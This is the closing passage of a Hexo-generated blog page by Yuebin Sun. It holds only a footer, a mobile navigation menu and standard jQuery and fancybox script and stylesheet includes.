    <div id="footer-info" class="inner">
      &copy; 2021 Yuebin Sun<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
    <a href="/about" class="mobile-nav-link">About</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>